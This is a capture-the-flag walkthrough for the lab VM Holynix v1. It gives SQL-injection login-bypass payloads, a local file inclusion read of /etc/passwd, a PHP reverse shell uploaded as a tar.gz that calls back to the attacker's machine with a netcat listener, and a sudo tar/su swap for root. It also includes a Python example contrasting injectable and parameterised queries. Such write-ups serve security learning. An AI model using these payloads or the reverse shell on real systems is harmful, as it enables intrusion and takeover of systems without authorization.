• VM: Holynix: v1
  • Goal: acquire root access
  • Approach: solve without automated exploitation tools

Network IP address fix

When I start the Holynix virtual machine using VMware Workstation 15 Player, the VM does not obtain an IP address automatically. I did the following to fix this issue:

  • Reset the root password
  • Log in to Holynix as root
  • Run the command: rm /etc/udev/rules.d/70-persistent-net.rules
  • Reboot Holynix: shutdown -r 0

After doing this, the VM should obtain an IP address correctly. Note: if you want to keep the original root password, record the root entry in the /etc/shadow file right before changing the root password and put it back after the procedure is completed.

Target Discovery

The first step is to locate the IP address of my target:

nmap -n -sn 192.168.172.200-254
[Screenshot: target discovery; found target at 192.168.172.213]

Port scanning

nmap -p- -A 192.168.172.213

Only port 80 is open.

Enumeration

Let's check out the website. There are not many pages on it: only the home page and the login page.

[Screenshot: home page]

Then, at the login page, I test for SQL injection and find that the password field is vulnerable by using a single quote (') as the password:

[Screenshot: password field SQL injection vulnerable]

I then log in without a password by using the following value as the password:

' or 1 = 1#
[Screenshot: login as alamo]

Nice. Now I am logged in as user alamo. There are a few links, so I browse around to find more information. The most eye-catching is the Upload link. It seems I can upload files to the web server. If I can view the page after uploading it, it may allow PHP code execution.

I then write up a simple file test.php to try:

<?php print "Hello" ?>
[Screenshot: test upload]

But unfortunately, user alamo does not have the privilege to upload files.

It looks like I need to log in as another user to try again. I then log out and use SQL injection again to log in as a different user:

' or 1 = 1 and username != 'alamo'#

[Screenshot: login again]

Good. This time I am logged in as etenenbaum. I then try uploading the test.php file again and succeed. Now I need to find where the file is. Since the feature is called 'Home Directory Uploader', I try ~etenenbaum as the path:
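To show why the two payloads above select different users, here is an added example (not code from the box or the walkthrough) with a constructed SQLite users table: the login check built by string concatenation beside the same check with bound parameters. SQLite has no '#' line comment, so the payloads use the SQLite equivalent '--' where the MySQL-style payload used '#'.

```python
import sqlite3

# Constructed in-memory users table standing in for the Holynix login backend
# (sample rows and passwords are made up, not taken from the VM).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alamo", "s3cret-a"), ("etenenbaum", "s3cret-e")])
    return db

def vulnerable_login(db, username, password):
    """Builds the query by concatenation: the flaw behind the bypass.
    AND binds tighter than OR, so the injected 'or 1 = 1 ...' clause
    turns the statement into 'match nothing OR <attacker condition>'."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = db.execute(query).fetchone()
    return row[0] if row else None

def safe_login(db, username, password):
    """Same check with bound parameters: input is data, never SQL text."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

# The two payloads from the walkthrough, with '--' in place of '#'.
BYPASS_ANY = "' or 1 = 1 --"
BYPASS_NOT_ALAMO = "' or 1 = 1 and username != 'alamo' --"

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_login(db, "", BYPASS_ANY))        # alamo
    print(vulnerable_login(db, "", BYPASS_NOT_ALAMO))  # etenenbaum
    print(safe_login(db, "", BYPASS_ANY))              # None
    print(safe_login(db, "alamo", "s3cret-a"))         # alamo
```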

[Screenshot: test file uploaded]

But unfortunately, I receive a Permission denied error when trying to browse test.php. Not good, but I don't give up yet. The uploader page has a checkbox 'Enable the automatic extraction of gzip archives'. I then make a copy of test.php as test2.php and compress it to test2.php.gz:

gzip test2.php

I then upload the gzip file instead to see what happens. No luck. While it says the file is uploaded successfully, nothing shows up. This is getting nowhere, so I move on to check other things.

Let's check out the Security link. This page has a drop-down select menu to pick a policy type and then displays its content. I set up Burp Suite as a proxy to intercept the request. I try to tamper with a parameter called text_file_name to see if I can perform LFI (local file inclusion). I test it by changing the value to /etc/passwd.

[Screenshot: local file inclusion]

Got it. The password file is shown, so the page is vulnerable to LFI. With the ability to display files, I can check the code of transfer.php, which is responsible for processing the upload. So I use this vulnerability to display the content of transfer.php.

[Screenshot: transfer.php code]

Upon reading the code, there are a couple of things I found about uploading gzip archives:

  • The upload content type must be application/gzip. I tested the upload using different browsers. Some browsers send content type application/x-gzip or application/x-tar instead. If the upload doesn't work, use Burp to check and ensure the content type is application/gzip.
  • sudo tar xzf is used to extract the files, and then the uploaded file is removed. I used gzip to create the gzip file, which is why it's not working: gzip alone produces a compressed single file, not a tar archive, so tar has nothing to extract.

I then go back and use tar to create the archive:

tar czf test2.tar.gz test2.php

And try the upload again. This time the file is uploaded and extracted successfully. I browse to the file and the page is shown with the PHP code executed. Great news!

[Screenshot: file executed]

Exploitation

There is a PHP reverse shell in the /usr/share/webshells/php folder. Copy and modify it to use my Kali box's IP address and port 4444. Then create the tar.gz archive:

cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php
tar czf rshell.tar.gz php-reverse-shell.php

The file is then uploaded to the server successfully.

[Screenshot: uploaded shell]

Now start a Netcat listener on the Kali box:

nc -lp 4444

Then browse to the reverse shell PHP file.

Awesome. Reverse shell obtained as user www-data.

Privilege Escalation

I noticed the upload PHP code was using sudo tar and sudo mv. Running sudo -l confirms that user www-data can run a few sudo commands:

sudo -l

This is enough to obtain root access with the following commands:

sudo mv /bin/tar /bin/tar.org
sudo mv /bin/su /bin/tar
sudo tar

Root access obtained!

Thank you to the author for the box Holynix: v1.
